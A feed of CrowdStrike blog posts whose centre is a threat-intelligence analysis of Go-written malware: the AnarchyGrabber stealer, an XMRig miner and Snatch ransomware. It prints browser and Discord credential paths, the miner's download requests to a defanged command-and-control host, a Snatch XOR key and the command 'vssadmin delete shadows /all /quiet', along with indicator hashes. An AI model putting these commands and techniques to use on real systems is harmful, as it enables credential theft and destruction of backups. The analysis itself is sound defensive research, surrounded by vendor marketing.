A wide range of vulnerabilities are being patched by Microsoft this month, from operating system patches and known protocols such as RDP to actively exploited vulnerabilities in Microsoft Exchange and Microsoft Excel — and any of these could greatly impact an organization’s security posture.

SecOps often do not have the time or capacity to patch everything ranked highly within their organization and would do best to tap into the knowledge and solutions that can most accurately assess which vulnerabilities to prioritize first. CrowdStrike has a continued commitment to providing SecOps teams with relevant and timely information around trending threats and valuable insight surrounding vulnerabilities — and with solutions such as Falcon Spotlight, staff can quickly target those vulnerabilities that post the most risk. Falcon Spotlight’s newly released ExPRT Rating examines all relevant data to help organizations predict and prioritize those vulnerabilities relevant to their organization. 

Learn More

Watch this video on Falcon Spotlight™ vulnerability management to see how you can quickly monitor and prioritize vulnerabilities within the systems and applications in your organization. 

About CVSS Scores

The Common Vulnerability Scoring System (CVSS) is a free and open industry standard that CrowdStrike and many other cybersecurity organizations use to assess and communicate software vulnerabilities’ severity and characteristics. The CVSS Base Score ranges from 0.0 to 10.0, and the National Vulnerability Database (NVD) adds a severity rating for CVSS scores. Learn more about vulnerability scoring in this article

Additional Resources 

✇ CrowdStrike

Golang Malware Is More than a Fad: Financial Motivation Drives Adoption

By: Anmol Maurya
  • Golang malware popularity snowballs, increasing by 80% from June to August 2021
  • eCrime turns to Golang because of its versatility, enabling cross-compiling for other operating systems 
  • Cryptocurrency miners earn the largest share of total Golang malware — 70% in August compared to 54% in June 2021

CrowdStrike researchers uncovered an 80% increase in Golang (Go)-written malware samples from June to August 2021, according to CrowdStrike threat telemetry. In terms of malware type, first place goes to coin miners, accounting for 70% of the malware spectrum in August 2021. Golang’s versatility in enabling the same codebase to be compiled for all major operating systems, coupled with the financial incentive offered by coin miners, could be one of the driving factors behind the recent wave of Go-written malware. However, we will likely see more Go-based malware as it is becoming more popular with developers.

Golang’s versatility has turned it into a one-stop shop for financially motivated eCrime developers. Instead of rewriting malware for Windows, macOS and Linux, eCriminals can use Golang to cross-compile the same codebase with ease, allowing them to target multiple platforms effortlessly. Other applications for Golang involve using it as a wrapper for various eCrime malware, such as ransomware. Some ransomware variants turned to Golang wrappers to make analysis more difficult for security research. 

Besides coin miners, password-stealing trojans and downloaders developed in Golang are also popular. These can potentially be handy to the eCrime community, especially access brokers, as they can serve as initial access and information harvesting tools into targeted systems and infrastructure. Whether Go-written malware is used to generate profit from victims by exploiting their computing power, or used as a tool to collect and potentially sell sensitive data and access into compromised infrastructures, financial motivation fuels eCrime adoption of Go-powered threats.

Figure 1. Daily Golang-written malware evolution (June-August 2021) (Click to enlarge)

eCrime dominates the threat landscape, making up 79% of interactive intrusion activity, according to the recent CrowdStrike 2021 Threat Hunting Report. However, most Go-written malware seems focused on generating revenue by exploiting the computing power of their victims and mining for cryptocurrency. Coin miners accounted for 54% of all Go-written malware in June 2021, 62% in July and 70% in August, according to CrowdStrike threat telemetry.

Figure 2. Golang-written malware distribution in June, July and August 2021

While 91% of identified Golang malware samples are compiled to target the Windows operating systems, 8% are compiled for macOS and 1% for Linux. Golang allows developers to use the same codebase and compile their code for Windows, Linux and macOS, but eCrime developers are likely targeting Windows more because of potential market share. Some of the more exotic malware families that we’ve identified as using Go revolve around ransomware such as GoGoogle ransomware, Ekans ransomware, eCh0raix ransomware and Snatch ransomware, as well as remote access trojans (RATs), such as CYBORG SPIDER’s Pysa Golang RAT.

Figure 3. File type distribution of Golang malware (June-August 2021)

Unusually, we did find instances where it’s not immediately apparent which cryptocurrency some coin miners are attempting to mine. While most coin miners are usually XMRig wrappers, developers likely wanted to give themselves the option of mining for any cryptocurrency that’s appealing at the time of infection. 

Why Stay When You Can GO?

One reason malware developers may not stay faithful to traditional programming languages — such as C++ or Python — and choose to go with Go could be because Go performs 40 times faster than optimized Python code, according to benchmarking tests. Also, a single codebase can be compiled into all major operating systems. 

Consequently, when analyzing Go-written malware, we generally need to focus on “main” functions. However, because of the large size of the samples, there’s also the added burden of going through many functions, unlike C/C++ where we usually find fewer. When Go compiles an executable, it also includes Go standard symbols in the binary, which can substantially increase the size of an executable. Golang binaries include a .gopclntab structure, which maps the symbol name and its corresponding offset. The structure also contains symbol names of functions created by the developer, prefixed with the string “main,” which is why we generally focus on “main” functions.

Adding obfuscation on top of all of this, using open-source tools such as “gobfuscate” — which allow malware developers to compile Go binaries from obfuscated source code — can significantly hamper reverse engineering efforts in terms of deciphering the malicious binary. 

Looking at threat telemetry from June to August 2021, three different Go-written malware samples were analyzed as case studies to identify some of the Golang-based malware’s capabilities. 

Next is a summary analysis of three different types of malware built using Golang.

GO-written AnarchyGrabber Password Stealer

A new Go-written AnarchyGrabber password stealer variant was spotted on Sept. 1,  2021, packing many of the same features of its C++ counterpart. The analyzed sample (SHA256 hash 86dda1e904475fdf187af0cb13c0b67951e95230ed2bc6a3ac79c292606fda8e) behaves in much the same way, stealing the victim’s Discord user token and using the platform to spread additional malware using the victim’s friends list.

AnarchyGrabber can steal passwords and usernames from Google Chrome/Brave and tokenlog the user’s Discord account, as shown in Table 1 below. It will then use a webhook to broadcast the victim’s passwords and user profiles from browsers, email address, login name, user token, passwords and IP address to a Discord channel operated by the threat actor. Using Discord as a C2 server for both exfiltrating data and accepting commands is not uncommon, and the Go-written variant of AnarchyGrabber perfectly emulates the C++ behavior of its C++ version.

main.grab_discord \AppData\Roaming\Discord\Local Storage\
main.grab_discord_canary \\Discordcanary\\Local Storage\\
main.grab_discord_ptb \\discordptb\\Local Storage\\
main.grab_google_chrome \AppData\Local\Google\Chrome\User Data\Default\Login
main.grab_opera \Opera Software\Opera Stable\Local Storage\
main.grab_brave \BraveSoftware\Brave-Browser\User Data\Default\Local Storage\
main.grab_yandex \Yandex\YandexBrowser\User Data\Default\Local Storage\

Table 1. AnarchyGrabber main functions

The developers behind this implementation of AnarchyGrabber seem to use some open-source tools for interacting with Discord webhooks or parsing snowflakes, which are uniquely identifiable descriptors for resources that contain a timestamp, such as accounts, messages, channels and servers.

The CrowdStrike Falcon® platform detects and protects against this type of Go-written malware using the power of the cloud, on-sensor and in-the-cloud machine learning, and indicators of attack (IOAs) to detect the threat. As the screenshot below illustrates, we detect this sample with our cloud-based machine learning, and it is immediately blocked.

Figure 4. CrowdStrike Falcon detection and protection for AnarchyGrabber (Click to enlarge)

GO(ing) for Crypto Mining

The spike in Go-written cryptominers is fueled in part by its adaptability. Malware authors either create custom miners or build wrappers for existing miners like XMRig. While creating wrappers is not new, it presents malware developers with the added benefit of allowing them to switch mining between various cryptocurrencies. Depending on which cryptocurrency is more popular or the victim’s computing power, threat actors can change which cryptocurrency they want to mine.

An example of a recent sample written in Go (SHA256 hash 995d7903e138b3f5aa318d44e959d215c6b28ea491f519af34c8bdad9a0ebda6) is also a XMRig wrapper compiled for Windows and uses a couple of interesting techniques that are unusual from other coin miners. Among its more novel features is killing processes that consume too much CPU. Its developers likely want to boost the cryptomining process by killing processes that are not critical, fully utilizing the victim’s computing power for financial gains.

Additional features include checking if the malware is already present on the victim’s machine, if there’s an instance of the process already running, and downloading other files from an attacker-controlled C2 server.

main.FileExists Checking the existence of file using OS.Stat
main.writetofile Writing to file using ioutil.WriteFile
main.isrunning Checking the status of Process using:
main.killprocess For killing the process the attacker is using taskkill
main.DownloadFile GETs Files from webserver
“GET /d/windowsupdatev1.json HTTP/1.1
Host: m[.]windowsupdatesupport[.]org
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip”

“GET /d/inj.exe HTTP/1.1
Host: m[.]windowsupdatesupport[.]org
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip”

“GET /d/runtime.dll HTTP/1.1
Host: m[.]windowsupdatesupport[.]org
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip”

“GET /d/autoupdate.exe HTTP/1.1
Host: m[.]windowsupdatesupport[.]org
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip”

“GET /d/updater.exe HTTP/1.1
Host: m[.]windowsupdatesupport[.]org
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip”

“GET /d/procdump.exe HTTP/1.1
Host: m[.]windowsupdatesupport[.]org
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip”

“GET /d/service.exe HTTP/1.1
Host: m[.]windowsupdatesupport[.]org
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip”
main.getcpuusage Using PS command to sort output based on RAM usage:
“ps -eo pid,ppid,cmd,%mem,%cpu –sort=-%mem | head -n 2 | tail -n “
It will use to kill processes that are utilizing RAM too much

Table 2. Coin miner main functions

Upon execution, this Go-written coin miner downloads the Runtime.dll file containing the debug path (“C:\Users\admin\Desktop\toolchain\deamon\hide_proc_research\Hide-Me-From-Task-Manager-master\HookerDLLBuild\bin\x64\Release\HookerDLL.pdb”). It also downloads an open-source command-line utility (Inj.exe) that actors potentially use to inject and eject DLLs, including Runtime.dll. It also uses Procdump.exe (a command was run that is associated with dumping LSASS process memory).

Among other features, its developers also included checking the version of the downloaded files to potentially update them should new releases be available and running daily scheduled tasks with the sample to ensure persistence on the compromised machine. 

The Falcon platform also detects this particular Go-written coin miner using machine learning and IOAs. As shown in Figure 5, our machine learning can block at the initial stage of an attack and uses IOAs triggered by various tactics and techniques.

Figure 5. CrowdStrike Falcon uses machine learning and IOAs of the tactics and techniques of the Golang-written coin miner (Click to enlarge)

GO Snatch, Go!

Snatch ransomware has been around since 2018, especially featuring multiple 32-bit or 64-bit implementations written in Golang. This is a perfect example of Golang being more than just a fad, but an actual “go-to” programming language that malware developers actively use. In fact, our own telemetry from June to August 2021 shows that Go-written malware accounted for 7% of all samples. 

After making its debut around late 2018, Snatch ransomware has been on and off the radar of security companies and researchers ever since. It has constantly been updated and improved with new anti-forensic features and various capabilities, as with any ransomware family.

Analyzing one of the more recent Snatch ransomware samples that’s compiled explicitly for Windows (e4b2d60cea9c09a7871d0f94fe9ca38010ef8e552f67e7cdec7489d2a1818354), not much has changed in terms of how previous researchers described the inner workings of ransomware. It uses the “ujvxadjxkoz” file extension for encrypted files. It places a “HOW TO RESTORE YOUR FILES.TXT” file in all the compromised folders. It continues to rely on the Golang openpgp package for operations on OpenPGP messages. 

However, among some of the changes implemented by this particular Snatch ransomware sample involve making changes to the exclusion list for encrypting various directories:

Program Files, ProgramData, Default User, recovery, $recycle.bin, perflogs, common files, dvd maker, msbuild, microsoft games, mozilla firefox, tap-windows, windows defender, windows journal, windows mail, windows nt, windows sidebar, microsoft.net, microsoft, start menu, templates, favorites

As seen in Figure 6, Snatch ransomware starts by initializing the main structures necessary for Golang malware execution and then uses the main_decodeString function to pass encrypted data first encoded with Base64, then uses XOR encryption using the key “mjkHreiUxqcTSyhWnbDXYuE.”

Figure 6. Snatch ransomware main_init functions

The main_makeBatFile creates a .bat file using main_randomBatFileName containing the queries “SC QUERY | FINDSTR SERVICE_NAME” and “vssadmin delete shadows /all /quiet”.  In this case, it creates a file with the nceirbfjdgljlw.bat filename.

In terms of persistence, Snatch ransomware uses the main_runService function to run Service using the SVC Golang package. Finally, the main_encrypt function is responsible for triggering the encryption process, at the end of which it places a ransom note in every encrypted folder on the victim’s system.

The ransom note provides two email addresses for contacting the ransomware operator to negotiate the ransom demand and potentially recover the encryption key.

Figure 7. Ransom note for Snatch ransomware (Click to enlarge)

The Falcon platform detects and protects against this type of Golang-written malware using the power of the cloud, on-sensor and in-the-cloud machine learning, and IOAs to detect the threat. As the screenshot below illustrates, we detect this sample with our cloud-based machine learning, and it is immediately blocked.

Figure 8. CrowdStrike Falcon using machine learning for detecting and preventing Snatch ransomware (Click to enlarge)

Note: More detailed intelligence and technical information about Snatch ransomware is available to CrowdStrike customers through the Falcon console.

Golang Is Here to Stay

Golang-written malware is not a fad and will not go away at any time soon. If anything, we are seeing an increase in Golang being used by malware developers and adversaries. This is likely in step with how we see Go being adopted by the general programming community as features and capabilities have improved.

Golang has proven to be a sufficiently versatile programming language that can accommodate any malware, although coin miners currently seem to pique the interest of developers. 

CrowdStrike will continue to monitor the evolution of the malware threat landscape and use the power of machine learning and IOAs to detect and protect endpoints from new and unknown malware. 

Indicators of Compromise (IOCs)

File SHA256
AnarchyGrabber 86dda1e904475fdf187af0cb13c0b67951e95230ed2bc6a3ac79c292606fda8e
Coin Miner 995d7903e138b3f5aa318d44e959d215c6b28ea491f519af34c8bdad9a0ebda6
Snatch Ransomware e4b2d60cea9c09a7871d0f94fe9ca38010ef8e552f67e7cdec7489d2a1818354
Runtime.dll 5b3fc771f43d8e67bd8957f7b3d9a49eae80b88e43c13cbf16623623e9028375
Inj.exe cc432ca276209849b1e4e36553d12aa87fd4cf1ba2609032986bf82943994774
Procdump.exe c073d88d4240fbd6b7183b126eb0f3617bad8944d7cf924982e2b814170a614f

Additional Resources

✇ CrowdStrike

The ICS/OT Landscape: How CrowdStrike Supports Through Partnerships With Rockwell and Others

By: David Hatchell

CrowdStrike and Rockwell Automation have announced a partnership to help joint customers secure the expanded threat surface of the industrial control systems (ICS) and operational technology (OT) controlling our energy, manufacturing our goods and operating our medical equipment. This has been a greenfield area for security due to the real-time nature of these systems and the need for continuous availability.

The Problem 

Today, the need for extending security controls in the ICS/OT area is most evident in the manufacturing sector, based on the intersection of the threat landscape and the digital transformation of the business. According to the CrowdStrike 2021 Threat Hunting Report, CrowdStrike Intelligence found that the manufacturing sector was the second most targeted industry by ransomware attacks from July 2020 to June 2021. This unique vertical is being targeted by both state-sponsored and eCrime actors. 

While destructive operations affecting ICS/OT environments that originate from select targeted intrusion adversaries are not likely to be aimed at manufacturing sector entities, these environments may be targeted in economic espionage campaigns that seek data repositories or other confidential business information — which can impact operational facilities. CrowdStrike Intelligence has identified several ransomware families used by eCrime adversaries that are capable of terminating OT processes in Windows systems, as evidenced by Ekans ransomware. 

Compounding the threat landscape is the digital transformation of the factory through the promise of Industrial IOT (Internet of Things) bringing in machines, cloud computing and edge-driven analytics to enhance the performance of an industrial process. The shift toward these services has driven a change from a heterogeneous environment with disconnected proprietary embedded systems and protocols, to a homogeneous landscape with cloud platforms, modern operating systems and unified architectures.

No longer can control system defenses hide behind the traditional air gap or security-by-obscurity due to the large amount of heterogeneous control system protocols and systems unique to each manufacturer. The combination of a homogenous attack surface, adversary targeting and an increased understanding of these systems has driven the need for increased comprehensive protection of these areas.

The challenge for CISOs and CIOs is to architect a comprehensive, sustainable security program to bring visibility, detection, protection and response to their plant environments in response to board-level initiatives to secure the factory and enable the workforce. Many of the challenges have been in building the proper governance, with the proper alignment between the plant and security teams to ensure security aligns with the availability and uptime requirements of the plant teams. On the technology side, most of the effort in the past few years has been focused around ICS-specific visibility in the plant environment, enumerating human-machine interface (HMI) and programmable logic controller (PLC) asset identification, vulnerability management and threat intelligence through network solutions designed to understand the heterogeneous automation networks and their requisite proprietary protocols.           

Organizations have traditionally been hesitant to introduce an endpoint technology into an OT security program. The conventional wisdom has been that the endpoint technology will interfere with a plant system, causing availability impact or potentially a lack of visibility to plant operations. This has resulted in plant teams demanding that their endpoint security technology be certified to interoperate with their automation equipment. 

This has led to years of testing by automation manufacturers of legacy endpoint security vendors, where they have had to incur a significant cost to test every engine and update file, and often have had to exclude the process directory from being scanned because of system conflicts from the AV technology hooking into the file in having to scan the file. Other methods such as application allowlisting have been used to harden the systems, but the use has proven limited against current attacks such as Mimikatz, which utilized PowerShell scripts to harvest credentials for lateral movement to gain access to domain controllers or other endpoints.  

The CrowdStrike Solution

CrowdStrike delivers the visibility and protection that organizations need to secure OT environments. The CrowdStrike Falcon® platform leverages real-time threat intelligence on evolving adversary tradecraft, indicators of attack and enriched telemetry from across the enterprise to deliver deep visibility, hyper-accurate detections and automated protection.

The platform’s cloud-native architecture and lightweight agent were purpose-built to scale across enterprise environments — delivering unprecedented efficacy against a wide variety of threats without impacting user or system performance. 

As a result, customers can quickly deploy basic endpoint detection and response (EDR) in a matter of minutes and be able to stream important events such as network connections, registry information and system properties directly to the cloud upon detection for retention and analysis. Unique attacks are analyzed by machine learning and our threat intelligence team to aid in remediation. Falcon is designed as an extensible solution that ensures new security countermeasures can be added to the platform seamlessly. The Falcon agent requires minimal inbound connectivity, and deployments can support a full Purdue model in Level 2/3 or 3.5 with a proxied environment to handle this connection. 

This gives our customers the ability to quickly move beyond basic visibility in their environment to real-time detection, protection and automated response. The technology can be deployed without impact to the HMIs and engineering workstations in the plant.  An automation vendor no longer has to go through the painful process of endless validation, and plant teams are able to rapidly deploy with no impact to production to “protect the crown jewels” of the key systems that operate their plants — thereby safely detecting, protecting and responding to attacks targeting the homogenous attack surface of modern industrial facilities. 


We are excited to work with Rockwell to address the challenges in the manufacturing vertical as well as other key verticals that Rockwell supports. Rockwell has used CrowdStrike since 2020 as its corporate standard to test its products at the time of release. The partnership expands this relationship to deliver CrowdStrike products and services coupled with Rockwell’s industrial security services to give the customer a full breadth of protection to address the needs of security teams and also the operational teams responsible for the 24/7 availability of the plant. 

This is a continued effort from CrowdStrike to work with manufacturers as they build out security products and services for their critical environments. We recently announced a partnership with Nihon Kohden, a global leader in precision medical products and service — it has validated and certified CrowdStrike and is providing a service to its customers to meet the needs of the healthcare industry. 

Furthermore, we have built partnerships with several providers that Rockwell partners with to extend the use cases of the Falcon platform to allow customers to drive additional value from their CrowdStrike investment.

Dragos offers a unique CrowdStrike Store application that leverages CrowdStrike endpoint telemetry data against the WorldView ICS-specific threat intelligence, allowing CrowdStrike customers to hunt for these specific indicators of attack. The combination of IT and OT threat intelligence allows end users to effectively threat hunt in their environment against both eCrime and state-sponsored attackers, who have demonstrated the sophistication to understand the unique nature of industrial environments.

Claroty is able to push into the CrowdStrike Falcon platform its unique intelligence and signatures in the plant networks for consumption. It leverages the Falcon agents deployed on the HMI and engineering workstations to pull the unique asset properties into its platform, and also the vendor-specific project files of its automation manufacturer that enumerate the PLC and I/O card information into the Claroty platform. This provides differentiated visibility without having to resort to active querying of the device itself, potentially impacting availability. This is an important use case that can further help our customers in their sustainability journey to secure their plants, moving from visibility to detection protection and response in their plant environments. Claroty is also participating in CrowdStrike’s XDR alliance, which brings Claroty’s network intelligence through an open framework.

Partnering for Success in ICS and OT environments

We are excited about our expanding partnerships that together bring our unique experience and solutions to help joint customers secure the expanding threat surface of ICS and OT environments against the continuously evolving threat landscape targeting this sector. The Falcon platform offers real-time protection and visibility across operational facilities, preventing attacks on endpoints on or off the network, and by partnering with Rockwell and other strategic partners in manufacturing and other verticals, we’re creating best-of-breed solutions that will meet the strident demands of the industrial IoT space. 

Additional Resources